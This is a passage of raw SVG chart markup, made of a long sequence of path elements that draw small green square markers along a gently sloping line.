fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 318.672 209.172 L 324.328 209.172 324.328 214.828 318.672 214.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 317.172 213.172 L 322.828 213.172 322.828 218.828 317.172 218.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 315.672 213.172 L 321.328 213.172 321.328 218.828 315.672 218.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 314.172 215.172 L 319.828 215.172 319.828 220.828 314.172 220.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 312.672 218.672 L 318.328 218.672 318.328 224.328 312.672 224.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 311.172 220.672 L 316.828 220.672 316.828 226.328 311.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 309.672 221.172 L 315.328 221.172 315.328 226.828 309.672 226.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 308.172 221.172 L 313.828 221.172 313.828 226.828 308.172 226.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 306.672 221.172 L 312.328 221.172 312.328 226.828 306.672 226.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 305.172 221.172 L 310.828 221.172 310.828 226.828 305.172 226.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 303.672 221.672 L 309.328 221.672 309.328 227.328 303.672 227.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 302.172 222.172 L 307.828 222.172 307.828 227.828 302.172 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 300.672 222.172 L 306.328 222.172 306.328 227.828 300.672 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 299.172 222.172 L 304.828 222.172 304.828 227.828 299.172 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 297.672 222.172 L 303.328 222.172 303.328 227.828 297.672 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 296.172 222.172 L 301.828 222.172 301.828 227.828 296.172 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 294.672 222.172 L 300.328 222.172 300.328 227.828 294.672 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 293.172 222.172 L 298.828 222.172 298.828 227.828 293.172 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 291.172 222.172 L 296.828 222.172 296.828 227.828 291.172 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 289.672 225.172 L 295.328 225.172 295.328 230.828 289.672 230.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 288.172 225.672 L 293.828 225.672 293.828 231.328 288.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 286.672 225.672 L 292.328 225.672 292.328 231.328 286.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 285.172 225.672 L 290.828 225.672 290.828 231.328 285.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 283.672 225.672 L 289.328 225.672 289.328 231.328 283.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 282.172 225.672 L 287.828 225.672 287.828 231.328 282.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 280.672 225.672 L 286.328 225.672 286.328 231.328 280.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 279.172 225.672 L 284.828 225.672 284.828 231.328 279.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 277.672 225.672 L 283.328 225.672 283.328 231.328 277.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 276.172 225.672 L 281.828 225.672 281.828 231.328 276.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 274.672 225.672 L 280.328 225.672 280.328 231.328 274.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 273.172 225.672 L 278.828 225.672 278.828 231.328 273.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 271.672 225.672 L 277.328 225.672 277.328 231.328 271.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 270.172 225.672 L 275.828 225.672 275.828 231.328 270.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 268.672 225.672 L 274.328 225.672 274.328 231.328 268.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 267.172 225.672 L 272.828 225.672 272.828 231.328 267.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 265.672 225.672 L 271.328 225.672 271.328 231.328 265.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 263.672 225.672 L 269.328 225.672 269.328 231.328 263.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 262.172 225.672 L 267.828 225.672 267.828 231.328 262.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 260.672 225.672 L 266.328 225.672 266.328 231.328 260.672 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 259.172 226.672 L 264.828 226.672 264.828 232.328 259.172 232.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 257.672 227.172 L 263.328 227.172 263.328 232.828 257.672 232.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 256.172 227.672 L 261.828 227.672 261.828 233.328 256.172 233.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 254.672 227.672 L 260.328 227.672 260.328 233.328 254.672 233.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 253.172 228.172 L 258.828 228.172 258.828 233.828 253.172 233.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 251.672 228.172 L 257.328 228.172 257.328 233.828 251.672 233.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 250.172 228.172 L 255.828 228.172 255.828 233.828 250.172 233.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 248.672 228.172 L 254.328 228.172 254.328 233.828 248.672 233.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 247.172 228.672 L 252.828 228.672 252.828 234.328 247.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 245.672 228.672 L 251.328 228.672 251.328 234.328 245.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 244.172 228.672 L 249.828 228.672 249.828 234.328 244.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 242.672 228.672 L 248.328 228.672 248.328 234.328 242.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 241.172 228.672 L 246.828 228.672 246.828 234.328 241.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 239.672 228.672 L 245.328 228.672 245.328 234.328 239.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 238.172 228.672 L 243.828 228.672 243.828 234.328 238.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 236.172 228.672 L 241.828 228.672 241.828 234.328 236.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 234.672 228.672 L 240.328 228.672 240.328 234.328 234.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 233.172 228.672 L 238.828 228.672 238.828 234.328 233.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 231.672 228.672 L 237.328 228.672 237.328 234.328 231.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 230.172 228.672 L 235.828 228.672 235.828 234.328 230.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 228.672 228.672 L 234.328 228.672 234.328 234.328 228.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 227.172 228.672 L 232.828 228.672 232.828 234.328 227.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 225.672 228.672 L 231.328 228.672 231.328 234.328 225.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 224.172 228.672 L 229.828 228.672 229.828 234.328 224.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 222.672 228.672 L 228.328 228.672 228.328 234.328 222.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 221.172 228.672 L 226.828 228.672 226.828 234.328 221.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 219.672 229.172 L 225.328 229.172 225.328 234.828 219.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 218.172 229.172 L 223.828 229.172 223.828 234.828 218.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 216.672 229.172 L 222.328 229.172 222.328 234.828 216.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 215.172 229.172 L 220.828 229.172 220.828 234.828 215.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 213.672 229.172 L 219.328 229.172 219.328 234.828 213.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 212.172 229.172 L 217.828 229.172 217.828 234.828 212.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 210.672 229.172 L 216.328 229.172 216.328 234.828 210.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 208.672 229.172 L 214.328 229.172 214.328 234.828 208.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 207.172 229.172 L 212.828 229.172 212.828 234.828 207.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 205.672 229.172 L 211.328 229.172 211.328 234.828 205.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 204.172 229.172 L 209.828 229.172 209.828 234.828 204.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 202.672 229.172 L 208.328 229.172 208.328 234.828 202.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 201.172 229.172 L 206.828 229.172 206.828 234.828 201.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 199.672 229.172 L 205.328 229.172 205.328 234.828 199.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 198.172 229.172 L 203.828 229.172 203.828 234.828 198.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 196.672 229.172 L 202.328 229.172 202.328 234.828 196.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 195.172 229.172 L 200.828 229.172 200.828 234.828 195.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 193.672 229.172 L 199.328 229.172 199.328 234.828 193.672 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 192.172 229.672 L 197.828 229.672 197.828 235.328 192.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 190.672 229.672 L 196.328 229.672 196.328 235.328 190.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 189.172 229.672 L 194.828 229.672 194.828 235.328 189.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 187.672 229.672 L 193.328 229.672 193.328 235.328 187.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 186.172 229.672 L 191.828 229.672 191.828 235.328 186.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 184.672 229.672 L 190.328 229.672 190.328 235.328 184.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 182.672 229.672 L 188.328 229.672 188.328 235.328 182.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 181.172 229.672 L 186.828 229.672 186.828 235.328 181.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 179.672 229.672 L 185.328 229.672 185.328 235.328 179.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 178.172 229.672 L 183.828 229.672 183.828 235.328 178.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 176.672 229.672 L 182.328 229.672 182.328 235.328 176.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 175.172 229.672 L 180.828 229.672 180.828 235.328 175.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 173.672 229.672 L 179.328 229.672 179.328 235.328 173.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 172.172 229.672 L 177.828 229.672 177.828 235.328 172.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 170.672 229.672 L 176.328 229.672 176.328 235.328 170.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 169.172 229.672 L 174.828 229.672 174.828 235.328 169.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 167.672 229.672 L 173.328 229.672 173.328 235.328 167.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 166.172 229.672 L 171.828 229.672 171.828 235.328 166.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 164.672 229.672 L 170.328 229.672 170.328 235.328 164.672 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 163.172 229.672 L 168.828 229.672 168.828 235.328 163.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 161.672 231.172 L 167.328 231.172 167.328 236.828 161.672 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 160.172 231.172 L 165.828 231.172 165.828 236.828 160.172 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 158.672 231.172 L 164.328 231.172 164.328 236.828 158.672 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 157.172 231.172 L 162.828 231.172 162.828 236.828 157.172 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 155.172 231.172 L 160.828 231.172 160.828 236.828 155.172 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 153.672 231.172 L 159.328 231.172 159.328 236.828 153.672 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 152.172 231.172 L 157.828 231.172 157.828 236.828 152.172 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 150.672 231.172 L 156.328 231.172 156.328 236.828 150.672 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 149.172 231.172 L 154.828 231.172 154.828 236.828 149.172 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 147.672 231.172 L 153.328 231.172 153.328 236.828 147.672 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 146.172 231.172 L 151.828 231.172 151.828 236.828 146.172 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 144.672 231.172 L 150.328 231.172 150.328 236.828 144.672 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 143.172 231.172 L 148.828 231.172 148.828 236.828 143.172 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 141.672 231.172 L 147.328 231.172 147.328 236.828 141.672 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 140.172 231.672 L 145.828 231.672 145.828 237.328 140.172 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 138.672 231.672 L 144.328 231.672 144.328 237.328 138.672 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 137.172 231.672 L 142.828 231.672 142.828 237.328 137.172 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 135.672 231.672 L 141.328 231.672 141.328 237.328 135.672 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 134.172 231.672 L 139.828 231.672 139.828 237.328 134.172 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 132.672 231.672 L 138.328 231.672 138.328 237.328 132.672 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 131.172 231.672 L 136.828 231.672 136.828 237.328 131.172 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 129.672 231.672 L 135.328 231.672 135.328 237.328 129.672 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 127.672 231.672 L 133.328 231.672 133.328 237.328 127.672 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 126.172 231.672 L 131.828 231.672 131.828 237.328 126.172 237.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 124.672 233.172 L 130.328 233.172 130.328 238.828 124.672 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 123.172 233.172 L 128.828 233.172 128.828 238.828 123.172 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 121.672 233.172 L 127.328 233.172 127.328 238.828 121.672 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 120.172 233.172 L 125.828 233.172 125.828 238.828 120.172 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 118.672 233.172 L 124.328 233.172 124.328 238.828 118.672 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 117.172 233.172 L 122.828 233.172 122.828 238.828 117.172 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 115.672 233.172 L 121.328 233.172 121.328 238.828 115.672 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 114.172 233.172 L 119.828 233.172 119.828 238.828 114.172 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 112.672 234.172 L 118.328 234.172 118.328 239.828 112.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 111.172 234.172 L 116.828 234.172 116.828 239.828 111.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 109.672 234.172 L 115.328 234.172 115.328 239.828 109.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 108.172 234.172 L 113.828 234.172 113.828 239.828 108.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 106.672 234.172 L 112.328 234.172 112.328 239.828 106.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 105.172 234.172 L 110.828 234.172 110.828 239.828 105.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 103.672 234.172 L 109.328 234.172 109.328 239.828 103.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 102.172 234.172 L 107.828 234.172 107.828 239.828 102.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 100.172 234.172 L 105.828 234.172 105.828 239.828 100.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 98.672 234.172 L 104.328 234.172 104.328 239.828 98.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 97.172 234.172 L 102.828 234.172 102.828 239.828 97.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 95.672 234.172 L 101.328 234.172 101.328 239.828 95.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 94.172 234.172 L 99.828 234.172 99.828 239.828 94.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 92.672 234.172 L 98.328 234.172 98.328 239.828 92.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 91.172 234.172 L 96.828 234.172 96.828 239.828 91.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 89.672 234.172 L 95.328 234.172 95.328 239.828 89.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 88.172 234.172 L 93.828 234.172 93.828 239.828 88.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 86.672 234.172 L 92.328 234.172 92.328 239.828 86.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 85.172 234.172 L 90.828 234.172 90.828 239.828 85.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 83.672 234.172 L 89.328 234.172 89.328 239.828 83.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 82.172 234.172 L 87.828 234.172 87.828 239.828 82.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 80.672 234.172 L 86.328 234.172 86.328 239.828 80.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 79.172 234.172 L 84.828 234.172 84.828 239.828 79.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 77.672 234.172 L 83.328 234.172 83.328 239.828 77.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 76.172 234.172 L 81.828 234.172 81.828 239.828 76.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 74.672 234.172 L 80.328 234.172 80.328 239.828 74.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 72.672 234.172 L 78.328 234.172 78.328 239.828 72.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 71.172 234.172 L 76.828 234.172 76.828 239.828 71.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 69.672 234.172 L 75.328 234.172 75.328 239.828 69.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 68.172 234.172 L 73.828 234.172 73.828 239.828 68.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 66.672 234.172 L 72.328 234.172 72.328 239.828 66.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 65.172 234.172 L 70.828 234.172 70.828 239.828 65.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 63.672 234.172 L 69.328 234.172 69.328 239.828 63.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 62.172 234.172 L 67.828 234.172 67.828 239.828 62.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 60.672 234.172 L 66.328 234.172 66.328 239.828 60.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 59.172 234.172 L 64.828 234.172 64.828 239.828 59.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 57.672 234.172 L 63.328 234.172 63.328 239.828 57.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 56.172 234.172 L 61.828 234.172 61.828 239.828 56.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 54.672 234.172 L 60.328 234.172 60.328 239.828 54.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 53.172 234.172 L 58.828 234.172 58.828 239.828 53.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 51.672 234.172 L 57.328 234.172 57.328 239.828 51.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 50.172 234.172 L 55.828 234.172 55.828 239.828 50.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 48.672 234.172 L 54.328 234.172 54.328 239.828 48.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 47.172 234.172 L 52.828 234.172 52.828 239.828 47.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 45.172 234.172 L 50.828 234.172 50.828 239.828 45.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 43.672 234.172 L 49.328 234.172 49.328 239.828 43.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 42.172 234.172 L 47.828 234.172 47.828 239.828 42.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 40.672 234.172 L 46.328 234.172 46.328 239.828 40.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 39.172 234.172 L 44.828 234.172 44.828 239.828 39.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 37.672 234.172 L 43.328 234.172 43.328 239.828 37.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 36.172 234.172 L 41.828 234.172 41.828 239.828 36.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 34.672 234.172 L 40.328 234.172 40.328 239.828 34.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 33.172 234.172 L 38.828 234.172 38.828 239.828 33.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 31.672 234.172 L 37.328 234.172 37.328 239.828 31.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 30.172 234.172 L 35.828 234.172 35.828 239.828 30.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 28.672 234.172 L 34.328 234.172 34.328 239.828 28.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 27.172 234.172 L 32.828 234.172 32.828 239.828 27.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 25.672 234.172 L 31.328 234.172 31.328 239.828 25.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 24.172 234.172 L 29.828 234.172 29.828 239.828 24.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 22.672 234.172 L 28.328 234.172 28.328 239.828 22.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 21.172 234.172 L 26.828 234.172 26.828 239.828 21.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 19.172 234.172 L 24.828 234.172 24.828 239.828 19.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 17.672 234.172 L 23.328 234.172 23.328 239.828 17.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 16.172 234.172 L 21.828 234.172 21.828 239.828 16.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 14.672 234.172 L 20.328 234.172 20.328 239.828 14.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 13.172 234.172 L 18.828 234.172 18.828 239.828 13.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 11.672 234.172 L 17.328 234.172 17.328 239.828 11.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 10.172 234.172 L 15.828 234.172 15.828 239.828 10.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 8.672 234.172 L 14.328 234.172 14.328 239.828 8.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 7.172000000000001 234.172 L 12.828 234.172 12.828 239.828 7.172000000000001 239.828 Z" fill="#55BF3B" stroke="#333" 